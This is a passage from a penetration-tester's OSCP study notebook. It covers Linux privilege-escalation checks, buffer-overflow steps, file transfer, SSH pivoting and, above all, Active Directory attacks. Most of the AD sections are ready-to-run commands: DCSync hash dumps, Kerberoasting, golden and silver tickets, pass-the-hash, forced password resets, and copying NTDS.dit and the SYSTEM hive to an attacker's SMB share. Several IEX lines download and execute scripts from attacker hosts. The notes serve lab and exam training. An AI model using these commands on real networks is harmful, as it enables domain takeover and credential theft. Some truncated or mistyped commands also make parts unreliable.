shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other
https://gtfobins.github.io/
3. Check services running on root:
References:
VulnHub - Kioptrix: Level 4
In reviewing multiple blogs and websites, the Kioptrix series is supposed to be for penetration tester beginners and is
rumored to be similar to the challenges within Offensive Security's PWK coursework. Since I classify myself as a
beginner/novice, my goal is to work through this series and document my findings along the way.
https://bond-o.medium.com/vulnhub-kioptrix-level-4-bc4184a79eeb
4. Check internal ports:
netstat -tulnp
netstat -plnt
Make sure you closely observe anything running on localhost or 127.0.0.1
5. Check kernel version and OS version for exploits:
uname -r
searchsploit <name/version_here>
Be sure to Google version numbers as well.
Automated Approach:
1. Linux Smart Enumeration
2. LinPEAS
3. Lin Enum
References:
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/rebootuser/LinEnum
Methodology — Offensive Security Certified Professional (OSCP) 21
https://github.com/carlospolop/PEASS-ng/releases/tag/20220814
Buffer Overflow (Memory Attack):
Visual Depiction:
The stack is overflowed and is replaced with malicious shellcode.
We will be attacking the Stack part of memory.
We need to overflow buffer space → write over buffer space down to EIP → Control the stack → spawn reverse shell
Remember, the buffer overflow methodology consists of several steps:
1. Spiking
a. Method to find the vulnerable part of the program.
2. Fuzzing
a. Sending a bunch of characters/messages to a program to break it.
3. Finding the offset
a. At what point did we break it? This is called the offset.
4. Overwriting the EIP
a. The offset will then be utilized to overwrite the EIP.
5. Finding bad characters
a. We need to find out which characters are compatible with the shellcode and which characters are not.
6. Finding the correct module
a. Looking for a DLL or something similar within a program that does not contain memory protections.
b. Mona Modules + Immunity Debugger
7. Generate shellcode that leads to RCE
Methodology — Offensive Security Certified Professional (OSCP) 22
Buffer Overflow Methodology Example
Additional Resources for Buffer Overflows:
TryHackMe | Buffer Overflow Prep
Practice stack based buffer overflows!
https://tryhackme.com/room/bufferoverflowprep
TryHackMe | Brainpan 1
Reverse engineer a Windows executable, find a buffer overflow and exploit it on a Linux machine.
https://tryhackme.com/room/brainpan
File Transfer (This took blood, sweat, and tears):
Windows2Linux
SMB Server Method:
Methodology — Offensive Security Certified Professional (OSCP) 23
On Kali:
impacket-smbserver PleaseWork $(pwd) -smb2support -user jacob -password work
On Windows:
$pass = convertto-securestring 'work' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('jacob',$pass)
New-PSDrive -Name jacob -PSProvider FileSystem -Credential $cred -Root \\10.10.16.12\PleaseWork
cd jacob:
Evil-WinRM:
# Download to your Kali:
Evil-WinRM download /file/name/here
# Upload a file to the Windows victim from Kali
Evil-WinRM upload /file/name/here
Kali2Windows
Certutil Method:
On Kali:
python3 -m http.server
On Windows:
certutil -urlcache -f http://<kali_ip_here:8000>/name_of_file
Transferring Files via Evil-WinRM:
Evil-WinRM: PS C:\programdata> upload /../../../PowerView.ps1
You need to utilize the upload command within EvilWinRM.
Pivoting:
Reference:
Pivoting - Port forwarding - Tunneling
Let's say that you have compromised one machine on a network and you want to keep going to another machine. You will use the first machine as a staging point/plant/foothold to
break into machine 2. The technique of using one compromised machine to access another is called pivoting.
https://sushant747.gitbooks.io/total-oscp-guide/content/port_forwarding_and_tunneling.html
Context: You compromised one machine on a network and you want to go to the next machine. You will use the first machine as a staging
point with your foothold to break into machine 2. The technique of using one compromised machine to access another is called pivoting.
Machine one is the pivot in this example. The pivot is just used as a way to channel or funnel our attack.
Methodology — Offensive Security Certified Professional (OSCP) 24
Ipconfig:
We are looking for machines that have at least three network interfaces such as (loopback, eth0, eth1, etc). These machines are
connected to other networks and we can use them to pivot.
Commands:
# Windows
ipconfig /all
route print
#Linux
ifconfig
ifconfig -a
Port Forwarding and Tunneling:
https://www.youtube.com/watch?v=JDUrT3IEzLI
Port Forwarding:
Context: You are on a network and you want to connect an FTP server or any other port to upload or download some files. However,
someone put crazy firewall rules (egress) filters that prohibits outgoing traffic on all ports except port 80. How will you be able to
connect our FTP server?
What we can do is add a machine that redirects/forwards all traffic that it receives on port 80 to port 21 on a different machine.
Instead of traffic looking like this:
PC1/port-21 -> FTP-server/port-21
It will look like this:
PC1/Port-80 -> Port-80/Proxy-Machine/Port-21 -> FTP-Server
The other way around applies too in order to receive traffic.
So, how do we implement this?
Rinetd - Port Forward/Redirect:
We can set up this port forwarding machine with the help of rinetd.
Installing rinetd:
apt-get install rinetd
We need to now modify the default config file that can be found in: /etc/rinetd.conf
Example/Use-Case:
We have the following machines:
Machine1 (111.111.111.111), which is behind a firewall and wants to connect to machine3.
Machine2 (222.222.222.222), will forward all incoming connections to machine3.
Machine3 (333.333.333.333), Will host the ftp-server that machine1 wants to connect to.
Methodology — Offensive Security Certified Professional (OSCP) 25
Within the config file, you will see bindaddress, bindport, connectaddress, and connectport. This is the essential part of the file that
makes port forwarding possible with rinetd.
To make this happen we will add the follwing:
# bindadress bindport connectaddress connectport
111.111.111.111 80 333.333.333.333 21
Now, restart the rinetd service to apply your changes:
/etc/init.d/rinetd restart
Conclusion:
The bind-address is where the proxy receives the connection and the connect-address is the machine it forwards the connection to.
SSH Tunneling - Port Forwarding on SSH:
Use Cases:
You want to encrypt traffic that uses unencrypted protocols such as:
VNC, IMAP, IRC, etc.
You are on a public network and want to encrypt all your HTTP traffic.
You want to bypass firewall rules.
Local Port Forwarding:
The following will make Google available on address localhost:8080:
ssh -L 8080:www.google.com:80 localhost
You can also forward ports like this:
ssh username@<remote-machine> -L localport:target-ip:target-port
ssh username@192.168.1.111 -L 5000:192.168..1.222:5000
Now this port will be available on your localhost. So you can go to:
nc localhost:10000
Remote Port Forwarding:
Remote port forwarding is a crazy, yet very simple concept. So imagine that you have compromised a machine and that machine has
MYSQL running but it is only accessible via localhost. You cannot access it because you have a bad shell. One way to get around this is
to just forward that port to our attacking machine.
Creating a remote port forward:
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
By the way, plink is an ssh-client for Windows that can be run from the terminal. The IP of the attacking machine is 111.111.111.111.
How-To:
1. On the compromised machine, we do the following:
Methodology — Offensive Security Certified Professional (OSCP) 26
plink.exe -l root -pw mysecretpassword 111.111.111.111 -R 3307:127.0.0.1:3306
2. Now, we can check netstat on our attacking machine, we should see something like this:
tcp 0 0 127.0.0.1:3307 0.0.0.0:* LISTEN 19392/sshd: root@pt
This means that we can connect to that port on the attacking machine from the attacking machine.
3. Connect using the following command:
mysql -u root -p -h 127.0.0.1 --port=3307
Dynamic Port Forwarding:
This can be used to dynamically forward all traffic from a specific application. This is really cool. With remote and local port
forwarding, you are only forwarding a single port.
However, this can be a hassle if your target machine has 10 ports open that you want to connect to. Instead, we can use a dynamic port
forwarding technique.
Dynamic port forwarding sounds really complicated, but it is very easy to set up. Just set up the tunnel like this. After is is set up, do not
run any commands in that session.
# We connect to the machine we want to pivot from
ssh -D 9050 user@192.168.1.111
Since proxychains uses 9050 by default (the default port for tor), we do not even need to configure proxychains.
To change that: /etc/proxychains.conf.
proxychains nc 192.168.2.222 21
Tunneling all HTTP/HTTPs traffic through SSH:
For this, we need 2 machines:
1. Machine1 - 111.111.111.111
a. This is the server that works as our proxy.
2. Machine2
a. This is the server that has a web browser.
First we check out what the public IP address is. We do this so that we know the IP address before and after so we can verify that it
works.
First, you set SSH to:
# On machine2 we run
ssh -D localhost:9999 root@111.111.111.111
# This can also be ran with the -N flag
ssh -D localhost:9999 root@111.111.111.111 -N
Now you go to Firefox/settings/advanced/network and SOCKS to add 127.0.0.1 and port 9999.
WARNING: This setup will more than likely leak DNS. Do not use if you need opsec.
Methodology — Offensive Security Certified Professional (OSCP) 27
To fix this, you can go to about:config in Firefox (in the address bar) and then look for network.proxy.socks_remote_dns, and
switch it to TRUE.
To check this: https://ipleak.net/
It will still say that we have WebRTC leaks.
To fix this: about:config and set the following to FALSE
media.peerconnection.established
SSHuttle:
This is a great tool that can allow you to pivot across networks.
https://www.youtube.com/watch?v=lGr7VUCBvOQ
https://github.com/sshuttle/sshuttle
Installation:
apt-get install sshuttle
Usage:
sshuttle -r root@192.168.1.101 192.168.1.0/24
Active Directory- Enumeration:
CheatSheet:
GitHub - PowerShellMafia/PowerSploit at dev
Execute code on a target machine. Injects a Dll into the process ID of your choosing. Reflectively loads a Windows PE file
(DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. Injects shellcode into the
process ID of your choosing or within PowerShell locally.
https://github.com/PowerShellMafia/PowerSploit/tree/dev
IEX (Run program remotely — Does not write to disk)
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Get Domain Users:
Get-NetUser * -Domain corp.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset, lastlogontimesta
Get Domain Computers:
Get-NetComputer * -Domain corp.local | Select-Object -Property dnshostname,operatingsystem,operatingsystemservicepack,lastlogontimestamp | E
Methodology — Offensive Security Certified Professional (OSCP) 28
SPN Ticket Request:
Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv .\ticket.csv -NoTypeInformation
Enumerating User DACLs:
PS C:\> Get-DomainObjectAcl -Identity it_admin -ResolveGUIDs ? { $_.SecurityIdentifier -Match $(ConvertTo-SID burmat) }
AceType : AccessAllowed
ObjectDN : CN=it_admin,CN=Users,DC=BURMAT,DC=CO
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2736429227-4547413232-2815246478-1130
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2736429227-4547413232-2815246478-1107
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
BloodHound — Ingestor Launch:
IEX(New-Object Net.WebClient).DownloadString('http://<IP>/ps/SharpHound.ps1');
Invoke-BloodHound -CollectionMethod All -CompressData -SkipPing;
Active Directory- Exploitation/Privilege Escalation:
https://www.youtube.com/watch?v=QfyZQDyeXjQ
https://www.youtube.com/watch?v=pZSyGRjHNO4
https://www.youtube.com/watch?v=VLA7x81i5Pw
https://www.youtube.com/watch?v=xH5T9-m9QXw
https://www.youtube.com/watch?v=o98_eRt777Y
https://www.youtube.com/watch?v=_nJ-b1UFDVM
Methodology — Offensive Security Certified Professional (OSCP) 29
https://www.youtube.com/watch?v=xowytiyooBk
ReadGMSAPassword:
This allows an attacker to use the password of a Group Managed Service Account which usually has elevated privileges.
HTB Example: Search
How-To:
$gmsa Get-ADServiceAccount -Identity bir-adfs-gmsa -Properties 'msds-managedpassword'
$gmsa
$mp = $gmsa.'msds-managedpassword'
$mp
$mp1 = ConvertFrom-ADManagedPasswordBlob $mp
$mp1
$passwd = $mp1.'currentpassword'
$passwd
$user 'BIR-ADFS-GMSA$'
$secpass = ConvertTo-SecureString $passwd -AsPlainText -Force
$cred = new-object system.management.automation.pscredential $user,$secpass
ReadGMSAPassword in BloodHound
GenericWrite/GenericAll/AllExtendedRights:
Allows an attacker to modify the object in question. In this example, we change the password of a Domain Admin. GenericWrite allows the
modification of certain things.
Methodology — Offensive Security Certified Professional (OSCP) 30
HTB Example: Search
How-To:
Invoke-Command -computername 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity tristan.davies -reset -NewPassword (ConvertTo-Secu
#kali:
wmiexec.py 'search/tristan.davies:Password1234!@search.htb'
Why would you invoke a command on localhost? This is because I am using another user’s credentials.
Note: Invoke-Command executes a command on another host.
With this, we can obtain domain admin access.
ForceChangePassword:
GenericWrite
Allows an attacker to change the password of the object in question.
HTB Example: Object
Requires: PowerView.ps1
Be sure to upload PowerView.ps1
How-To:
# On PowerShell or Windows shell:
. .\PowerView.ps1
$newpass = ConvertTo-SecureString 'Password1234!' -AsPlainText -Force
Set-DomainUserPassword -Identity smith -AccountPassword $newpass
# On Kali:
evil-winrm <IP> -u smith -p Password1234!
Methodology — Offensive Security Certified Professional (OSCP) 31
ForceChangePassword
PowerView:
Allows for additional manipulation of AD. Many of the commands presented by BloodHound require PowerView.
HTB Example: Object
How-To:
. .\PowerView.ps1
echo "ls \users\user\desktop > \programdata\out" > cmd.ps1
Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\cmd.ps1"}
ls
type out
WriteOwner:
Allows an attacker to set the owner of the object and make themselves a member of the object.
HTB Example: Object
How-To:
. .\PowerView.ps1
Invoke-ACLScanner -ResolveGUIDs | ? {$_.identityreferencename -like 'maria'}
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria' # Make Maria the owner
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights all # Grant Maria all rights
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
net group "Domain Admins" /domain
# You should see maria.
# Log out and log back in.
Methodology — Offensive Security Certified Professional (OSCP) 32
SeBackupPrivilege & SeRestorePrivilege:
Allows the attacker access to any file on the machine given they take the appropriate steps.
In this example, we can be seen taking the NTDS.dit and System.hive file.
This is done with a tool called robocopy.
This grants you access to files even if you do not have permissions.
HTB Example: Blackfield
How-To:
# How to enumerate for this:
whoami /priv
SeBackupPrivilege Enabled
SeRestorePrivilege Enabled
robocopy /b c:\users\administrator\desktop\ c:\
gci c:\
In other words, if you EVER SEE SeBackupPrivilege, you AUTOMATICALLY have access to root.txt as soon as you run this
command!
NTDS.dit and System.hive:
Once an attacker has access to these files, an attacker can dump hashes from the DC using DCSync.
HTB Example: Blackfield
1. Initiate Backup
echo "Y" | wbadmin start backup -backuptarget:\\<tun0_IP>\smb -include:c:\windows\ntds
The backup operation successfully completed.
2. Obtain wbadmin version:
wbadmin get versions
wbadmin x.x - Backup command-line tool
# Pay attention to the version of wbadmin and the second date of version identifier as you will need this for the next command.
3. Obtain NTDS.dit:
echo "Y" | wbadmin start recovery -version:07/16/2022-07:43 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:c:\ -
notrestoreacl
Do you want to continue?
[Y] Yes [N] No Y
4. Export system.hive and transfer to our attacker machine:
reg save HKLM\SYSTEM c:\system.hive
cp ntds.dit \\<tun0_IP>\smb\NTDS.dit
cp system.hive \\<tun0_IP>\smb\system.hive
exit
Methodology — Offensive Security Certified Professional (OSCP) 33
5. Navigate to your SMB drive on your Kali and run secrets.dump.py against NTDS.dit and System.hive:
secretsdump.py -ntds NTDS.dit -system system.hive LOCAL
You will then have an entire dump of hashes obtained from the entire Active Directory.
6. Utilize wmiexec.py to pass the hash and authenticate as that user:
wmiexec.py -hashes :<hash_here> administrator@<IP_HERE>
C:\>whoami
blackfield\administrator
For example, grab the administrator hash for domain access. Grab the second half of the hash only, not the entire thing.
Account Operators/WriteDACL —> DCSync Attack:
In the account operators group, an attacker can create users and place them in non-protected groups.
Placing a new user in a group with WriteDACL, enables an attacker to modify the new user’s DACL.
In this example, we can give our new user DCSync rights.
DACL- Discretionary Access Control List
This commonly happens due to “scope creep”.
HTB Example: Forest
Step 1:
# Kali
evil-winrm -i <IP> -u svc-alfresco -p s3rvice
# Once authenticated (Windows)
net user jacob Password1234! /add /domain
net group "Exchange Windows Permissions" jacob /add
net localgroup "Remote Management Users" jacob /add
Bypass-4MSI
[+] Success!
Step 2:
# On Kali
locate PowerView.ps1
cd into directory w/ PowerView.ps1
python3 -m http.server
# On Windows
iex(new-object net.webclient).downloadstring('http://<kali_ip>:8000/PowerView.ps1')
$pass = convertto-securestring 'Password1234!' -asplain -force
$cred = new-object system.management.automation.pscredential('htb\jacob', $pass)
Add-ObjectACL -PrincipalIdentity jacob -Credential $cred -Rights DCSync
exit
Methodology — Offensive Security Certified Professional (OSCP) 34
Step 3:
# On Kali
secretsdump.py htb\jacob@<IP>
Password: Password1234!
# You will obtain all of the hashes. Grab the administrator hash (the second half).
psexec.py administrator@<IP> -hashes <Hash_Here>
C:\Windows\system32>
GetChangesAll/Replication (DCSync):
This is one of the coolest escalation vectors in my opinion.
DCSync allows an attacker to impersonate a failover Domain Controller.
This then allows all user hashes to be shared.
Look for GetChanges that point towards the domain.
Example:
Also be sure to look in “Dangerous Rights” within BloodHound.
HTB Example: Forest/Sizzle
secretsdump.py egotistical-bank/svc_loanmgr@<IP> -just-dc-user Administrator
# Obtain Administrator hash
psexec.py egotistical-bank.local/administrator<IP> -hashes <admin_hash_here>
C:\Windows\system32> whoami
nt authority\system
Kerberoasting vs. AS-REPRoasting:
Methodology — Offensive Security Certified Professional (OSCP) 35
Kerberoasting means that a user has a Service Principal Name (SPN) associated with it. We can then theoretically request the SPN and
request the DC to send us the hash for us to crack. This can be accomplished with the script below.
Check if the user has a SPN with the following command:
Get-UserSPNs.py -request -dc-ip <IP> search.htb/hope.sharp:IsolationIsKey
# The SPN will appear as RESEARCH/web_svc.search.htb:60001
# You will also get a hash, save it and crack with John
john --wordlist=/usr/share/wordlists/rockyou.txt hash
AS-REPRoasting means that Kerberos Pre-Authentication is disabled on that user. You will also receive a TGT hash that can then be
cracked. This can be accomplished with the script below.
Check with the following command:
Get-NPUsers.py LICORDEBELLOTA.HTB/Kaorz -dc-ip <IP> -no-pass
# You will get a TGT hash. Save the hash in a file and crack the hash
hashcat -m 18200 hash rockyou.txt
DCSync Attack with MimiKatz → Kerberos Service Account → Golden Tickets:
An extremely powerful attack.
.\mimikatz.exe
mimikatz # lsadump::dcsync /domain:htb.local /user:krbtgt
Credentials:
Hash NTLM: <Hash_Here>
Kerberos Cheatsheet:
Bruteforcing
Kerbrute.py:
kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
Rubeus:
# List of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
# Check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
AS-REPRoasting
Impacket (GetNPUsers.py):
# check ASREPRoast for all domain users (credentials required)
GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfil
# check ASREPRoast for a list of users (no credentials required)
GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_resp
Methodology — Offensive Security Certified Professional (OSCP) 36
Rubeus:
# check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
Cracking with dictionary attack:
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
john --wordlist=<passwords_file> <AS_REP_responses_file>
Kerberoasting
Impacket (GetUserSPNs.py):
GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
Rubeus:
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
Cracking with dictionary attack:
hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>
Overpass The Hash/Pass The Key (PTK-Attack)
Impacket:
# Request the TGT with hash
getTGT.py <domain_name>/<username> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with aesKey
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with password
python getTGT.py <domain_name>/<user_name>:[password]
# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>
# Execute remote commands with any of the following by using the TGT
psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Rubeus:
# Request/Inject ticket
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
PsExec:
# Execute a command remotely
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Methodology — Offensive Security Certified Professional (OSCP) 37
Pass The Ticket (PTT-Attack)
You can do this two ways. One from Linux and the other from Windows.
Grabbing ticket from Linux:
grep default_ccache_naame /etc/krb5.conf
Grabbing ticket from Windows:
Mimikatz:
mimikatz # sekurlsa::tickets /export
Rubeus:
.\Rubeus dump
# After dump with Rubeus tickets in base64, to write the in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
Using the ticket in Windows/Linux
Linux:
# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>
# Execute remote commands with any of the following by using the TGT
psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Windows:
Inject ticket via Mimikatz:
mimikatz # kerberos::ptt <ticket_kirbi_file>
Inject ticket via Rubeus:
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Execute a remote command via PsExec:
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Silver Ticket
Impacket:
# To generate the TGS with NTLM
ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
# To generate the TGS with AES key
ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>
Methodology — Offensive Security Certified Professional (OSCP) 38
# Execute remote commands with any of the following by using the TGT
psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Mimikatz:
# To generate the TGS with NTLM
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<
# To generate the TGS with AES 128 key
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name
# To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name
# Inject TGS with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
Rubeus:
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Executing a remote command with PsExec:
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Golden Ticket
Impacket:
# To generate the TGT with NTLM
ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
# To generate the TGT with AES key
ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>
# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>
# Execute remote commands with any of the following by using the TGT
psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Mimikatz:
# To generate the TGT with NTLM
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
# To generate the TGT with AES 128 key
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
# To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
# Inject TGT with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
Rubeus:
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Methodology — Offensive Security Certified Professional (OSCP) 39
Executing a remote command with PsExec:
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Resetting Domain User Password:
If you own the owner of another AD user object (WriteOwner, WriteDACL, GenericWrite, Owner, etc), you can reset the password:
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
$user = 'DOMAIN\owner_acct';
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
$newpass = ConvertTo-SecureString 'burmatw@sh3r3' -AsPlainText -Force;
Set-DomainUserPassword -Identity 'DOMAIN\vuln_user' -AccountPassword $newpass -Credential $creds;
You can even set yourself as the owner:
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Set-DomainObjectOwner -Identity it_admin -OwnerIdentity burmat
Add-DomainObjectAcl -TargetIdentity it_admin -PrincipalIdentity burmat
$newpass = ConvertTo-SecureString -String 'burmat123$' -AsPlainText -Force
Set-DomainUserPassword -Identity it_admin -AccountPassword $newpass
Cheatsheets:
Mimikatz
The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and
remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection
for the LSA to prevent reading memory and code injection by non-protected processes.
https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz
SQL Injection
interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they
are not normally able to retrieve. This might include data belonging to other users, or any other data that the application
itself is able to access.
https://book.hacktricks.xyz/pentesting-web/sql-injection
XXE - XEE - XML External Entity
lt; and > represent the characters . These are metacharacters used to denote XML tags, and so must generally be
represented using their entities when they appear within data.
https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity
XSS (Cross Site Scripting)
cannot escape from the attribute ( " is being encoded or deleted), then depending on which attribute your value is being
reflected in if you control all the value or just a part you will be able to abuse it.
https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
Methodology — Offensive Security Certified Professional (OSCP) 40
SSTI (Server Side Template Injection)
Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side
template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as
data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
Login Bypass
Checklist - Local Windows Privilege Escalation
https://book.hacktricks.xyz/pentesting-web/login-bypass
IDOR
Checklist - Local Windows Privilege Escalation
https://book.hacktricks.xyz/pentesting-web/idor
File Inclusion/Path traversal
Remote File Inclusion (RFI): The file is loaded from a remote server (Best: You can write the code and the server will
execute it). In php this is disabled by default ( allow_url_include).Local File Inclusion (LFI): The sever loads a local
file.
https://book.hacktricks.xyz/pentesting-web/file-inclusion
Client Side Template Injection (CSTI)
you can execute JavaScript expressions within double curly braces. For example, if yourinput is being reflected inside
the body of the HTML and the body is defined with ng-app:
https://book.hacktricks.xyz/pentesting-web/client-side-template-injection-csti
Command Injection
Checklist - Local Windows Privilege Escalation
https://book.hacktricks.xyz/pentesting-web/command-injection
Active Directory attack
Get-NetUser * -Domain corp.local | Select-Object -Property
name,samaccountname,description,memberof,whencreated,pwdlastset,
lastlogontimestamp,accountexpires,admincount,userprincipalname, serviceprincipalname, mail,useraccountcontrol |
https://fareedfauzi.gitbook.io/oscp-notes/others/active-directory-attack#enumerate-user-dacls
Methodology — Offensive Security Certified Professional (OSCP) 41